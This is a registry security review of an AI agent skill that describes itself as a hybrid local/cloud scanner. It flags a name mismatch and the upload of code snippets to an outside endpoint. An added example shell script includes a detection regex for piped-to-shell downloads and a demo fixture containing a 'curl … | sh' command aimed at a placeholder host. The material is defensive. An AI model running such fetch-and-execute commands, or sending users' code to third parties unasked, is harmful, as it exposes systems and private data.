Skill v0.0.1

ClawScan security

my-test-skill · ClawHub's context-aware review of the artifact, metadata, and declared behavior.

Scanner verdict

Suspicious · Mar 12, 2026, 8:27 AM
Verdict
suspicious
Confidence
medium
Model
gpt-5-mini
Summary
The skill's instructions describe a hybrid local/cloud security scanner, but two issues warrant caution before installing: the registry name does not match the identity given in SKILL.md, and cloud mode uploads extracted code snippets to an external endpoint, which is a privacy and network concern.
Guidance
This skill appears to implement a legitimate hybrid local/cloud scanner, but take these precautions before installing:
1) Verify the publisher's identity and that the registry package name matches the SKILL.md branding (my-test-skill vs yidun-skill-sec).
2) Understand that cloud mode will POST fingerprints, behavior tags, and extracted code snippets to https://as.dun.163.com (NetEase Yidun); if that metadata or those snippets could be sensitive, disable cloud mode (YIDUN_SKILL_SEC_CLOUD=false) or avoid using the skill.
3) Confirm that you trust the external operator and that sending package data abroad is consistent with your organization's policies.
4) If you need stronger assurance, request a signed release, a canonical source (GitHub repo/release), or an audited implementation rather than relying on SKILL.md prose alone.
Findings
[no-code-files] expected: The static regex scanner found no code files because this is an instruction-only skill (SKILL.md + README). The absence of code files is expected, but it means the scanner could not validate any implementation details; the skill's behavior is driven entirely by the prose in SKILL.md, which the model it runs on will interpret at execution time.

Review Dimensions

Purpose & Capability
note: The SKILL.md and README describe exactly what the description promises: local fingerprinting and static analysis plus an optional cloud intelligence POST to as.dun.163.com. The required binaries (curl, jq, openssl) are appropriate for that purpose. However, the registry metadata lists the skill as 'my-test-skill' while the SKILL.md/README identify the package as 'yidun-skill-sec' / 'YidunClawSec' (branding mismatch), an incoherence worth verifying with the publisher.
Instruction Scope
concern: The instructions explicitly compute file-level hashes, extract the code snippets that triggered detections, build a fingerprint manifest, and upload the fingerprints, behavior tags, and snippet evidence to a remote endpoint. Uploading extracted code snippets (even partial ones) to an external service is within the stated purpose (cloud analysis) but is a privacy/data-exfiltration risk that users should be aware of. The SKILL.md also references source metadata (install_url, author data) that implies additional registry queries or metadata collection outside the package; those network actions are not declared in the registry metadata, although they are consistent with what the scanner needs.
Install Mechanism
ok: Instruction-only skill with no install spec and no code files; nothing is downloaded or installed by the skill package itself. This minimizes install-time risk. The only runtime network activity described is to the cloud analysis endpoint, which is reached via curl (a declared binary).
Credentials
note: No required secrets or privileged env vars are listed. Two optional env vars are declared (YIDUN_SKILL_SEC_CLOUD to toggle cloud mode, and YIDUN_SKILL_SEC_TRUSTED_REGISTRIES), which is proportionate. Still, because the skill will send fingerprints and extracted snippets to an external endpoint, users should consider whether that data is acceptable to disclose to the named operator (NetEase Yidun) before enabling cloud mode.
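The Instruction Scope and Credentials dimensions above describe the local stage (file hashes, snippet extraction, a manifest) and the YIDUN_SKILL_SEC_CLOUD toggle in prose only. The script below is an added example, not the skill's own code and not taken from its SKILL.md: it reproduces that local stage with the declared binaries (openssl, curl) so a user can see exactly what would leave the machine, and it gates the POST on the env var, printing the payload instead of sending it when cloud mode is off. The manifest format, the detection regex, the function names and the use of the endpoint URL as the POST target are assumptions; the real SKILL.md schema is not shown on this page.

```shell
#!/bin/sh
# Added example (not the skill's code): local fingerprint stage plus cloud gate.
# Function names, manifest layout and detection pattern are hypothetical.

# sha256 of one file via openssl (declared binary), falling back to sha256sum.
file_sha256() {
  if command -v openssl >/dev/null 2>&1; then
    openssl dgst -sha256 "$1" | awk '{print $NF}'
  else
    sha256sum "$1" | awk '{print $1}'
  fi
}

# Manifest: one line per file, "relative-path sha256 size-in-bytes", sorted
# so the output is stable across runs (assumed layout).
build_manifest() {
  dir=$1
  find "$dir" -type f | LC_ALL=C sort | while IFS= read -r f; do
    printf '%s %s %s\n' "${f#"$dir"/}" "$(file_sha256 "$f")" \
      "$(wc -c < "$f" | tr -d ' ')"
  done
}

# Snippet evidence: the lines that matched a detection, in "file:line:text"
# form. This is the data the review flags as leaving the machine in cloud
# mode. Default pattern (assumed) flags curl/wget output piped into a shell.
extract_snippets() {
  dir=$1
  pattern=${2:-'(curl|wget)[^|]*\|[[:space:]]*(ba|z)?sh'}
  find "$dir" -type f | LC_ALL=C sort | while IFS= read -r f; do
    grep -n -E -- "$pattern" "$f" 2>/dev/null | sed "s|^|${f#"$dir"/}:|"
  done
}

# Cloud gate: any value other than "false" leaves cloud mode on, matching
# the review's advice to set YIDUN_SKILL_SEC_CLOUD=false to opt out.
cloud_enabled() {
  [ "${YIDUN_SKILL_SEC_CLOUD:-true}" != "false" ]
}

# POST the payload to the endpoint named in the review, or dry-run it.
# Content type and body framing are assumptions.
submit_payload() {
  payload=$1
  if cloud_enabled; then
    curl -sS -X POST -H 'Content-Type: text/plain' \
      --data-binary @"$payload" https://as.dun.163.com
  else
    echo "cloud mode disabled; would POST this to https://as.dun.163.com:"
    cat "$payload"
  fi
}

# Stand-alone run on a constructed sample skill directory.
if [ "${1:-}" = "--demo" ]; then
  demo=$(mktemp -d)
  printf 'echo hi\n' > "$demo/safe.sh"
  printf 'curl https://example.invalid/x | sh\n' > "$demo/install.sh"
  { build_manifest "$demo"; extract_snippets "$demo"; } > "$demo/payload.txt"
  YIDUN_SKILL_SEC_CLOUD=false submit_payload "$demo/payload.txt"
  rm -rf "$demo"
fi
```

Run with `sh scan_demo.sh --demo` to see the manifest and the matched snippet printed locally; remove YIDUN_SKILL_SEC_CLOUD=false from the last call only after you have decided that content is acceptable to send to the operator.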
Persistence & Privilege
ok: 'always' is false, and the skill does not request persistent platform-level privileges or the ability to modify other skills. Autonomous invocation is allowed by default, but that is the platform norm and not by itself a red flag here.